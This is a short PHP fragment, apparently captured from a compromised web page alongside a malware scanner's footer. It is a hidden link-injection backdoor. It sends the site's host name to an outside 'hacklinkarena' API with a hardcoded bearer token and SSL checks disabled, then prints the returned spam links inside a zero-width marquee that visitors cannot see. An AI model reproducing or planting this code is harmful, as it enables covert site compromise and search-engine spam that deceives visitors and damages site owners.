$host = $_SERVER['HTTP_HOST'];
                                $url = "https://api.hacklinkarena.com/api/v1/bring-orders?host=".$host;
                                $headers = [
                                    'Authorization: Bearer 8IJ4WzlJMsrTNSgegxgGkGK4E7uariyaeZXBxXYq',
                                    'Accept: application/json',
                                ];
                                $ch = curl_init();
                                curl_setopt($ch, CURLOPT_URL, $url);
                                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                                curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
                                curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
                                curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
                                curl_setopt($ch, CURLOPT_TIMEOUT, 30);
                                $response = curl_exec($ch);
                                if (curl_errno($ch)) {
                                    die("cURL error: " . curl_error($ch));
                                }
                                curl_close($ch);
                                $data = json_decode($response, true);
                                echo "";
                                if (isset($data["items"]) && is_array($data["items"])) {
                                    echo '<marquee style="position: absolute; width: 0px;">';
                                    foreach ($data["items"] as $item) {
                                        if (!empty($item["site_address"]) && !empty($item["keyword_1"])) {
                                            echo '<a href="' . htmlspecialchars($item["site_address"]) . '" target="_blank" title="' . htmlspecialchars($item["keyword_1"]) . '">';
                                            echo htmlspecialchars($item["keyword_1"]);
                                            echo '</a>';
                                        }
                                    }
                                    echo '</marquee>';
                                }            
                         
            © 2023 Quttera Ltd. All rights reserved.